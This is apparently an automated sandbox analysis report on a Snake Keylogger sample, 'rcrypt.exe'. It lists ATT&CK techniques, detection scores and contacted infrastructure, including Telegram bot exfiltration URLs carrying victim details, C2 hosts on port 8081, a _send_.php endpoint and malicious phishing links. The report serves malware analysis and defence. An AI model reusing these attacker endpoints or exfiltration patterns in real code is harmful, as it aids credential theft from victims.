DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rcrypt.exe	76%	ReversingLabs	Win32.Spyware.Snakekeylogger
rcrypt.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2025/07/2024%20/%2001:28:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	malware
http://mail.logosbd.net	0%	Avira URL Cloud	safe
http://logosbd.net	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
mail.logosbd.net	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2025/07/2024%20/%2001:28:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000002.00000002.3772899142.0000000003113000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	RegSvcs.exe, 00000002.00000002.3772899142.000000000310E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000002.00000002.3772899142.0000000003113000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.logosbd.net	RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.00000000030BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000002.00000002.3772899142.00000000030BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003025000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003025000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://logosbd.net	RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a	RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
202.4.96.3	unknown	Bangladesh	23956	AMBERIT-BD-ASAmberITLimitedBD	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480061
Start date and time:	2024-07-24 14:46:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rcrypt.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 57 Number of non-executed functions: 282
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: rcrypt.exe

Simulations

Behavior and APIs

Time	Type	Description
08:47:28	API Interceptor	12020715x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse
	TxCOT6OBFk.exe	Get hash	malicious	Unknown	Browse
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse
	83M0VAEEuh.exe	Get hash	malicious	WhiteSnake Stealer	Browse
202.4.96.3	DHL_FILL_FORM.exe	Get hash	malicious	AgentTesla	Browse
188.114.96.3	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	wx.ax/Xm6
	http://comicextra.me/favicon.ico	Get hash	malicious	Unknown	Browse	comicextra.org/favicon.ico
	AED 47,000.exe	Get hash	malicious	FormBook	Browse	www.yi992.com/iuti/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eadkqsUM/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/yavjNkfZ/download
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	tny.wtf/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0DmcWsUI/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.96.3
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	KQtHehIECg.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.247.73
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
api.telegram.org	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	TxCOT6OBFk.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	149.154.167.220
	83M0VAEEuh.exe	Get hash	malicious	WhiteSnake Stealer	Browse	149.154.167.220
bg.microsoft.map.fastly.net	roquette.com PURCHASE ORDER.htm	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.sharestion.com/gbr/d6200b74-7a9c-4169-a527-49a4b2071e6d/16fcce32-ac38-4718-80a3-878f58d98100/32f91c0a-3a5a-4117-a15a-e86fe077e3d9/login?id=TXlvMFhMM0I2TDVDUVJ0ZCt2SjNiT3EzcUhGSEp1dDVheTZwQkVXM2dvWkxhbnZpNXNEcFVhNWxha2VLSnRGTTF6eThLOUptQ3F5Y2tvS1R5MUEzWkRuYyt1dlRSQTBSYkRmRjFUcjErc1YwS1NmNlRTSUFrcWtlUE8xRlFsWVRXM01kZktmai80VG1aM3M5K2wzQWdlVGhVcnRsNXlvaGNLTlNJOUo1SzhMb2ZXdFowS2ZUdVlaTFlJZzBKMGZ5cDIvQ01rb1dCV3RtcnRFMmkyQkVtU3JDNHIrRno2d1ZybE5jd0ZrV0JRK1hDUHA3QjZhTW1vaU9lbjEvcFBua2g5OVd5MHRxUEF2TTU0ZjdON3FvMUE4dG1ySTI1Ymt6T2dsZzlLRlc5cVVwOVh0bG00cm0yZitEcysvN1gzc0tzZVNvQnBYdURONWVIRHlQSDc2UW0vc1FvOXR3aTJyQkMxdmNQSjFOTzZ1QVhJSHFXYW4rYUpmRGgvQWVQZGN0NGhFWUVjNVQyWFFzbW8rQ3hJdktVUT09	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://www.agrimarkeurope.com/feed-commodities.	Get hash	malicious	Unknown	Browse	199.232.210.172
	K7Vp9qOJMN.exe	Get hash	malicious	Remcos	Browse	199.232.214.172
	20240108.2001.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://presentationprojectconvini.dorik.io/	Get hash	malicious	Unknown	Browse	199.232.210.172
	aEzkowQO4H.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://securepubads.g.doubleclick.net/pcs/view?adurl=https://vefzrlhbb.cc.rs6.net/tn.jsp?f=001vXBf4j0AOa0SyR61aoskl_kad2s3858SYUG04aj8L2kKTSpWcYbZEk2UMvbh0XebT2eWfL1GAJ0EZ6QeagXutmieHF2Fb3P4PPVJvp3UegO_mBnTOYzTw6oPPzwS7g9CVUPGu1cUXuOvLv7yoqcYQ9mI3dPTVj8oNFvg7X-EdC_OlekTnk5rmk543EGhrzmRJvugLF6hiB7mYWarSmDTz_CXnZiGPCogPIPB3pv-YynKZ9dppazt1UsAqxMOiLFo1N7tH4SrQ3Vio_ouLFK7q7WcIyM95p4-nt6YQDZuP_sNzSUF6di8p-PRJIoHXQb_vMZ3b5t1jqbCnXkcyXpTNrZLcmdU7kOz5cQ7jssGeYRD71eDi5kDkqAikjUSnoxWIlv3zJrKULQQC3SOHdC-A1ERuI0uCK6YtsPx5ywLHc2HKJc9llBKoVLjNsb5Vv5ZDMiyiOiMhS6lEpfNPX4-R-LNRX_pl-bEqqKNM338vrX-5cUKCGVFT9mhH8cUNHx_nSTlNlOOcNWmiMTdubvIy2joYxTP3X2W5r8JBfeKzz3IBjse-QDrA2oPrPvb0FMMmRZCJ4uhSJDtg3hcYx-YqvvmOawj6hLMQEP4E_kFHItvwrl4Nizos7bPsSUAenzH&c=&ch=	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	Ppa2pTNcFC.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://flowto.it/agLzYsh4b	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	TxCOT6OBFk.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://datingsitefree.pages.dev/link-2	Get hash	malicious	Unknown	Browse	149.154.167.99
AMBERIT-BD-ASAmberITLimitedBD	JiUm2xQj3e.elf	Get hash	malicious	Mirai	Browse	118.179.144.155
	Summary of DXB,CNE & NE.exe	Get hash	malicious	AgentTesla	Browse	118.179.92.24
	Summary of DXB,CNE & NE.exe	Get hash	malicious	AgentTesla	Browse	118.179.92.24
	Summary of DXB,CNE & NE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	118.179.92.24
	INV2024020090.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	118.179.92.24
	INV2024020090.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	118.179.92.24
	Dispatch Details.exe	Get hash	malicious	AgentTesla	Browse	118.179.92.24
	Purchase_Order_No.1364.exe	Get hash	malicious	AgentTesla	Browse	118.179.92.24
	Order.exe	Get hash	malicious	AgentTesla	Browse	118.179.92.24
	file.exe	Get hash	malicious	SmokeLoader	Browse	202.4.114.123
CLOUDFLARENETUS	Fw PROPOSITION DE BELGOSUC.eml	Get hash	malicious	SharepointPhisher	Browse	188.114.97.3
	roquette.com PURCHASE ORDER.htm	Get hash	malicious	Unknown	Browse	188.114.96.3
	ELECTRONIC RECEIPTGrba.html	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.canva.com/design/DAGL1KVwhx0/GKVImkBFgqHp2esQ4hZ4Gg/edit	Get hash	malicious	Unknown	Browse	172.67.74.152
	Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://relsoftware.com	Get hash	malicious	HTMLPhisher	Browse	104.18.20.138
	25C1.exe	Get hash	malicious	Glupteba, Xmrig	Browse	104.20.3.235
	https://forms.office.com/r/tV6LkCsNt1	Get hash	malicious	Unknown	Browse	104.18.36.155
	abrirpdf_45868.msi	Get hash	malicious	HTMLPhisher	Browse	172.67.150.91
	231210-10-Creal-33652f.exe	Get hash	malicious	Creal Stealer	Browse	172.67.74.152
ORACLE-BMC-31898US	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	KQtHehIECg.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	94.156.8.9-skid.x86-2024-07-23T17_40_07.elf	Get hash	malicious	Mirai, Moobot	Browse	129.213.65.188

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
